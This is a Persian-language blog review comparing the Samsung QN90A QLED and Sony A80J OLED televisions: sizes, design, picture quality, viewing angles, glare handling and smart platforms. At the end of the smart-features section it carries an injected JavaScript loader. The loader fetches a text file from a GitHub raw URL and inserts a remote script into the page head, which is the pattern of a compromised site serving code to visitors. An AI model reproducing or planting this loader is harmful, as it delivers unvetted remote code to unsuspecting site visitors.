دسته‌بندی نشده

مقایسه تلویزیون های سامسونگ QLED مدل QN90A و سونی OLED مدل A80J

تلویزیون های QN90 و A80J با پنل های متفاوتی عرضه شده اند و هر دو ان ها عملکردی عالی را ایجاد می کنند. تلویزیون اولد سونی نسبت کنتراست عالی و بی نهایت خوبی دارد درحالی که در تلویزیون کیولد سامسونگ از پنل VA استفاده شده است و کنتراستی ضعیف تر ارائه می دهد. در تلویزیون QN90A با استفاده از نور های پس زمینه Mini LED و استفاده از قابلیت لوکال دیمینگ رنگ های مشکی بسیار عمیقی تولید می شود. مهم ترین برتری تلویزیون سامسونگ نسبت به سونی روشنایی فوق العاده ان حتی در محتویات HDR و امکان استفاده از تلویزیون در اتاق های روشن می باشد. 

اینچ های مختلف عرضه شده

برای هر دو تلویزیون به صورت همسان و مشابه اینچ های مختلف زیادی عرضه شده است. اینچ های کوچک و بسیار بزرگ از این دو تلویزیون را می توان برای محیط ها و سالن های مختلف استفاده کرد. سایز های ارائه شده برای این تلویزیون ها شامل 43 و 50 اینچ مناسب برای محیط های کوچک و متوسط, 55 و 65 اینچ برای سالن های نسبتا بزرگ و 75, 77 و 85 اینچ مناسب برای سالن های بزرگ در متراژ بالا می باشند. 

دیزاین و طراحی 

تلویزیون QN90A سامسونگ در طراحی بسیار زیبا و ممتاز عرضه شده است و طراحی ان به تلویزیون Q90T نزدیک و مشابه است. این تلویزیون دارای ظاهری زیبا و شیک با فریم های باریک است که در هرگونه دکوراسیونی جذاب به نظر می رسد. پایه تلویزیون در قسمت مرکزی ان قرار داد و ارتفاع و بلندی نسبتا خوبی دارد بنابراین می توان به اسانی ساندبار را جلو تلویزیون بدون نگرانی از پوشاندن صفحه قرار داد. تلویزیون A80J سونی طراحی مشابه با A90J از همین برند دارد. پایه های دو طرفه تلویزیون زیبایی و جذابیتی بالا دارد و می تواند هرگونه دکوراسیونی را ارتقا دهد. این پایه ها به صورت انعطاف پذیر ساخته شده اند و امکان تغییر حالت ان ها در در سه موقیمت متناسب با نیاز کاربران وجود دارد. در یکی از حالت ها تلویزیون به میز نزدیک تر می شود و ارتفاع ان پایین می اید. حالتی جمع و جور تر برای استفاده از تلویزیون روی میز های کوچک قابل تنظیم است و موقیت اخر برای قرار دادن ساندبار جلو تلویزیون مورد استفاده قرار می گیرد. قسمت پشتی تلویزیون سامسونگ از جنس پلاستیک و روی ان یک منظم کننده کابل تعبیه شده است. درگاه های ارتباطی این تلویزیون در قسمت کناری قرار گرفته اند که دسترسی به ان ها در حالت اتصال به دیوار بسیار اسان می باشد. پنل و پایه های تلویزیون سونی از جنس فلزی هستند در صورتی که برای بقیه قسمت ها از پلاستیک استفاده شده است. یک قسمت مخصوص برای قرار گیری کابل ها مشابه سامسونگ روی این تلویزیون وجود دارد و همچنین بر خلاف تلویزیون A8H سونی کابل ان قابل جدا شدن می باشد. هر دو این تلویزیون ها دارای بدنه ظریف هستند بنابراین هنگام وصل شدن به دیوار جلوه ای زیبا و درخشان خواهند داشت. 

کیفیت تصویر و نحوه ارائه ان ها 

تلویزیون QN90A از کیفیت تصویر بالا و عالی 4K بهرمند است و می تواند بدون هیچ ایرادی این محتویات را روی نمایشگر به نمایش بگزارد. تلویزیون A80J نیز می تواند محتویات فورکی را به زیبایی نمایش دهد. در تلویزیون سامسونگ رنگ های مشکی فوق العاده ای ارائه می شوند. رنگ های مشکی این نمایشگر عمق بسیار زیادی دارند و تنها در قسمت های کناری تا حدی دچار افت خواهند شد. تلویزیون سونی مانند تمامی پنل های OLED پیکسل ها به صورت فردی خاموش می شوند بنابراین عمیق رنگ های مشکی بسیار عالی است و به صورت کاملا تیره با جزئیات دقیق به نمایش در می ایند. QN90A سامسونگ نسبت کنتراست بسیار بالایی دارد. اگرچه پنل های VA از نظر کنتراست عملکردی عالی ندارند اما با بکار گیری لوکال دیمینگ در این تلویزیون کنتراست خوب و مناسبی از این تلویزیون مشاهده خواهد شد اگر به دنبال نسبت کنتراست بالا تر و نزدیک به بی نهایت هستید A90J سونی انتخابی عالی است. تلویزین A80J را می توانید در اتاق های تاریک برای تماشا فیلم استفاده کنید و شاهد عملکردی عالی از ان باشید. در این تلویزیون نسبت کنتراست بسیار عالی و فوق العاده می باشد. 

زاویه دید و کنترل انعکاس

با استفاده از تکنولوژی زاویه دید گسترده اختصاصی سامسونگ  در این تلویزیون زاویه دید مناسب و گسترده ای وجود دارد. در این تلویزیون  تصاویر در قسمت های کناری به صورتی دقیق و زیبا عرضه می شود اما تا حدی دچار تاری می شوند در هر صورت می توان گفت انتخابی مناسب و کاربردی برای تماشا در قسمت های حاشیه می باشد. تلویزیون A80J زاویه دید عالی دارد اما نسبت به A1 ال جی دارای عملکردی ضعیف تر است. تصاویر در قسمت های حاشیه ای به زیبایی و با کیفیت مناسب پخش می شوند.
QN90A سامسونگ کنترل بسیار بالایی بر روی انعکاس نور دارد و می توان از ان در اتاق های بسیار روشن استفاده کرد. تلویزیون A80J دارای نمایشگر مات می باشد. کنترل انعکاس در این نمایشگر خوب است اما نمی توان از ان در اتاق های نورانی و بسیار روشن استفاده کرد. 

ویژگی های اسمارت

هر دو این تلویزیون به صورت اسمارت با قابلیت های هوشمند مختلف ارائه شده اند. در تلویزیون سامسونگ از سیستم عامل اختصاصی این برند تایزن و نسخه 2021 ان استفاده شده است. استفاده از این پلتفرم بسیار اسان است و همچنین حساس و روان می باشد.  A80J مانند دیگر تلویزیون های سونی عرضه شده در 2021 به عنوان یک گوگل تی وی شناخته می شود. نسخه 10 از این پلتفرم با استفاده اسان و روان برای این تلویزیون تعبیه شده است. این پلتفرم نوع ارتقا یافته از اندروید است و هنگام استفاده تجربه عالی را برای کاربران ایجاد می کد.  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *